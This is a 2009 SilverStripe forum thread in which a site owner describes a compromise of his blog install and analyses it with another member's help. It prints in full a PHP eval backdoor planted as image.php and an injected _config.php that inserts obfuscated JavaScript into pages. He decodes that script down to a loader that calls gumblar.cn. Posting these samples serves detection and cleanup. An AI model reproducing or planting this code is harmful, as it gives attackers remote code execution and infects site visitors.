Skip to main content

This site requires you to update your browser. Your browsing experience maybe affected by not having the most up to date version.

Blog Module /

Discuss the Blog Module.

Moderators: martimiz, Sean, biapar, Willr, Ingo, swaiba, simon_w

BUG + HACK standard install WARNING - Blog "image.php" identical duplicates created in blog|cms|sapphire /images/


Go to End
Reply


20 Posts   8117 Views

Avatar
stayatplay

Community Member, 13 Posts

6 May 2009 at 7:11am

Edited: 07/05/2009 11:46am

>> Using SilverStripe-v2.3.1.tar.gz md5: e58977eb716f1d7b1ad28c12dc993486
>> Using blog-v0.2.0.tar.gz md5: 781dd48c9ae1b30ec31e8a826ddd95dc
(edit)
WARNING: if you have any of the following files, your server has been HACKED. Please check your md5 signatures, if they match these, you *have a problem* and need to take action likely involving re-installing and securing your server permissions afterwards. Good idea to check inside these files manually, if you have a non-standard install because the exploit might be there and have other md5 signature because of file content being different. In particular, the "_config" files are altered in almost each directory they are found.

The files named "_config" in directories "blog/", "cms/", "googlesitemaps/", "mysite/", "sapphire/" are all hacked.

"mysite/_config.php" md5: 2F4A1A0C278C60FC9C3A31DEF465F0A1
"cms/_config.php" md5: 5ECF9B3109A75050C97330DF18889ADD
"blog/_config.php" md5: FFCE682E09CAD3F5801E2F5F6D9B6B74
"sapphire/_config.php" md5: E346AEA21C8935FFAC52472256BEB94D
"googlesitemaps/_config.php" md5: A001D0104EAD59B54A74BCA56F28EAF0

file "image.php" in directories "blog/images/" and "cms/images/" and "sapphire/images/"
with (md5: "ba9da4e2190433e17ac7120ad82e5649")
THIS FILE SHOULD NOT EXIST in a standard install in any of those directories, it's a hack.
(/edit)

---

SilverStripe 2.3.1 - I got a warning when I tried to flush the cache saying "Warning there are two 'image' files with the same filename:" etc...
"This might mean that the wrong code is being used in .../sapphire/core/ManifestBuilder.php" on line 279
- which is just a message line variable.

All of a sudden and out of the blue, my Silverstripe installation wouldn't allow me to enter the Admin portion of my site. I can log-in, but freeze with the Sillverstripe logo, no cms. If I go to my blog page, I can see content - I can see that I am logged in because it offers to create a new post if I want, or log out. If I log out and in, no change. Digging around via sftp I found:

There are 3 identical "image.php" duplicate files created in blog|cms|sapphire /images/
Their md5 signature is "ba9da4e2190433e17ac7120ad82e5649", with the exact same creation date, earlier today when I was likely editing the site.

They contain the string:

<?php eval(base64_decode('aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpO2VjaG8gJzM2MzQyYjMyMzYyZTM2MzAyZTMyMzQzYTczNzQ2MTcxNjE3NDcwNmM2MTdkM2E2YTczNzU2YzZjNzc2ZDc0NzA2YzY0MjgzMjMwMzAzOSc7')); ?>

Which decoded is:

if(isset($_POST['e']))eval(base64_decode($_POST['e']));echo '36342b32362e36302e32343a737461716174706c617d3a6a73756c6c776d74706c642832303039';


(note: can't decode it further, any ideas on what that turns out to be?)
[see http://www.functions-online.com/base64_decode.html]

I deleted the 3 "image.php" files but Silverstripe still doesn't work. Cannot use the admin function. There is a bug somewhere that created these files and/or corrupted something else - so I cannot log-in and use the CMS.

After I deleted the 3 files, I rebuilt the cache, rebuild the database cache, which all work fine, but still cannot log-in and use CMS.

Anyone have any ideas?
Do I have to reinstall everything?

Do I remove the blog component and then reinstall that?
What would you suggest?

This is using the latest version of silverstripe.

-Hugo.

Attached Files
Avatar
rbquirke

Community Member, 70 Posts

6 May 2009 at 8:53am

Hi Hugo

I would be extremely suspicious of those files.
They look like your site has been compromised and those files placed there maliciously. I have seen similar on other sites I have had to sort out.

If I were you I would remove all the content, put in a fresh install of SilverStripe and then replace any changes customisations you have piece by piece, making sure to only add in what you know is untouched code.

If you need any assistance, let me know.

Ronan

Avatar
stayatplay

Community Member, 13 Posts

6 May 2009 at 12:20pm

Edited: 06/05/2009 5:38pm

[edit: obviously it *is* a hack, see further below; I am guessing it's a remote exploit on a standard Silverstripe installation. ]

It sounds awfully improbable that it's a hack since I have zero traffic - I just installed the blog.
However, I had already renamed the files at once when I discovered them, so they had a different name and didn't have a php ending.

I since re-installed, erased the old directory. I figured that was the safest thing to do. Being new to Silverstripe I had to re-post the content which was a pain, but I only had 4 posts, so do-able.

I am confused however. What is the correct permissions setting for a normal Silverstripe installation?

assetts
blog
cms
googlesitemaps
jsparty
mysite
sapphire
themes

All folders except Assets should be read write execute for the owner, read no write no execute for the group and read no write no execute for everyone? i.e. "744" permissions. Or what is the correct way, for a blog installation?

Avatar
rbquirke

Community Member, 70 Posts

6 May 2009 at 12:43pm

Those files are a way of passing in malicious php commands into the image.php scripts on your site so a hacker can run that php on your server. It is a hack.

Do you have your own server or just being hosted somewhere?

If there are any other sites using he same account, or you are testing Silverstripe in a subdirectory of another site, then the hack could have come from somewhere else.

744 should be correct I think for all other folders other than assets.

Avatar
stayatplay

Community Member, 13 Posts

6 May 2009 at 2:28pm

Edited: 06/05/2009 4:56pm

Recently Hostway changed my site to a Debian server with PHP 5 so that I could install Silverstripe.
I just changed all the folder permissions to 711, after re-installing seems to be working fine now.

Avatar
stayatplay

Community Member, 13 Posts

6 May 2009 at 3:56pm

Edited: 06/05/2009 4:13pm

For good measure I put in an ".htaccess" file in the
"/sapphire/images/" and "/blog/images/" and "/cms/images/" directories to stop this from happening again:

<Files *.php>
Order deny,allow
Deny from all
</Files>

Not sure if it will do any good but it's a precaution.
Maybe the standard Silverstripe installation should include this htaccess file in those directories to avoid any tampering with them, since they're not supposed to have anything but images anyway.

Also changed my password of course.

Avatar
stayatplay

Community Member, 13 Posts

6 May 2009 at 4:45pm

Edited: 06/05/2009 5:43pm

I made an archive of the folder that I deleted and have been checking it out see what I find...

The "/blog/_config.php" file ( md5: FFCE682E09CAD3F5801E2F5F6D9B6B74 )
which should start out empty in a Silverstripe installation, had this...

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbihDcVBBKXt2YXIgb09CWHo9JyUnO3ZhciBDYWp5PSd2YXIsMjBhLDNkLDIyLDUzY3JpcHQsNDUsNmVnaSw2ZWUsMjIsMmMsNjIsM2QsMjJWZXJzaW8sNmUoLDI5KywyMiwyY2osM2QsMjIsMjIsMmN1LDNkLDZlYXZpZ2F0b3IsMmV1LDczLDY1ckFnLDY1biw3NCwzYmksNjYoKCw3NSwyZSw2OW4sNjRleE9mLDI4LDIyV2luLDIyKSwzZTApLDI2LDI2KHUsMmVpbmRleE9mKCwyMiw0ZVQsMjA2LDIyLDI5LDNjMCksMjYsMjYoZG8sNjN1bWVuLDc0LDJlY29va2ksNjUsMmVpbmRleE9mKCwyMm1pZWssM2QxLDIyKSwzYzApLDI2LDI2KCw3NHlwZW9mLDI4enJ2enRzKSwyMSwzZHR5LDcwZSw2ZmYoLDIyQSwyMikpLDI5LDdienIsNzYsN2EsNzRzLDNkLDIyQSwyMiwzYmV2YWwsMjgsMjJpLDY2KHcsNjluLDY0byw3NywyZSwyMithKywyMilqLDNkaissMjIrLDYxLDJiLDIyTSw2MWpvciwyMissNjIrYSssMjJNaW5vciwyMitiK2ErLDIyLDQydWksNmNkLDIyK2IrLDIyaiwzYiwyMiksM2JkLDZmY3VtZW50LDJldyw3Mml0ZSgsMjIsM2NzYyw3MmksNzAsNzQsMjBzLDcyYywzZCwyZiwyZmcsNzVtYiw2Y2FyLDJlY24sMmZycyw3MywyZiwzZmlkLDNkLDIyK2osMmIsMjIsM2UsM2MsNWMsMmZzY3JpcHQsM2UsMjIsMjksM2IsN2QnO3ZhciBvMjhTUz1DYWp5LnJlcGxhY2UoQ3FQQSxvT0JYeik7ZXZhbCh1bmVzY2FwZShvMjhTUykpfSkoLywvZyk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script><script type="text/javascript" src="http://silverstripe.org/jsparty/jquery/jquery.js?m=1227766836"></script><script type="text/javascript" src="http://silverstripe.org/mysite/javascript/misc.js?m=1229400826"></script><script type="text/javascript" src="http://silverstripe.org/themes/silverstripe/javascript/jquery.fancybox-1.0.0.js?m=1229311003"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.js?m=1227135758"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/forum.js?m=1234757076"></script><script type="text/javascript" src="http://silverstripe.org/forum/javascript/jquery.MultiFile.js?m=1227135758"></script><script type="text/javascript">//<![CDATA[

         (function($) {
            $(document).ready(function() {
               var popupElements = $('a.fancy');
               if(typeof(popupElements) != 'undefined' && popupElements.length > 0) popupElements.fancybox({overlayShow: true});
            });
         })(jQuery);
      

//]]></script>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

?>

( see http://www.functions-online.com/base64_decode.html to decode )

the obfuscated part of that string, using the base64_decode turns into this

<script language=javascript><!--
(function(CqPA){var oOBXz='%';var Cajy='var,20a,3d,22,53cript,45,6egi,6ee,22,2c,62,3d,22Versio,6e(,29+,22,2cj,3d,22,22,2cu,3d,6eavigator,2eu,73,65rAg,65n,74,3bi,66((,75,2e,69n,64exOf,28,22Win,22),3e0),26,26(u,2eindexOf(,22,4eT,206,22,29,3c0),26,26(do,63umen,74,2ecooki,65,2eindexOf(,22miek,3d1,22),3c0),26,26(,74ypeof,28zrvzts),21,3dty,70e,6ff(,22A,22)),29,7bzr,76,7a,74s,3d,22A,22,3beval,28,22i,66(w,69n,64o,77,2e,22+a+,22)j,3dj+,22+,61,2b,22M,61jor,22+,62+a+,22Minor,22+b+a+,22,42ui,6cd,22+b+,22j,3b,22),3bd,6fcument,2ew,72ite(,22,3csc,72i,70,74,20s,72c,3d,2f,2fg,75mb,6car,2ecn,2frs,73,2f,3fid,3d,22+j,2b,22,3e,3c,5c,2fscript,3e,22,29,3b,7d';var o28SS=Cajy.replace(CqPA,oOBXz);eval(unescape(o28SS))})(/,/g);
--></script>

( see http://www.functions-online.com/urldecode.html to decode )
then substituting ',' for '%' then using urldecode turns into this...

var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window." a ")j=j " a+"Major" b a "Minor" b a "Build" b "j;");document.write("<script src=//gumblar.cn/rss/?id=" j+"><\/script>");}

According to McAfee SiteAdvisor "gumblar.cn" is a chinese site that has been flagged by Google safe browsing as hosting malware and trojans. [ see http://www.siteadvisor.com/sites/gumblar.cn for report ]

I am guessing this is some sort of remote injection exploit with the standard installation of Silverstripe, so beware - smarter people than I in the Silverstripe community should look into this. As I said in the beginning, all 3 files had the same creation date so they were likely created by a script. Any white hats out there willing to figure this out? Maybe something needs to be changed in Silverstripe standard install to help the community avoid this elsewhere.

Avatar
rbquirke

Community Member, 70 Posts

6 May 2009 at 5:06pm

I saw something very similar on another SilverStripe I was asked to rescue.
At the time I suspected a Wordpress installation on the same hosting account but now I am not so sure....

If you would like, and don't mind me having them, can you email:
- a zip of the saved site with the hack
- any log files from your account you can download (error log & access/web log)
- a timeline of when you first installed the site, whether there was anything on the hosting a/c before etc

My address is ronan/at/cuplaweb.com

Cheers

Ronan

Go to Top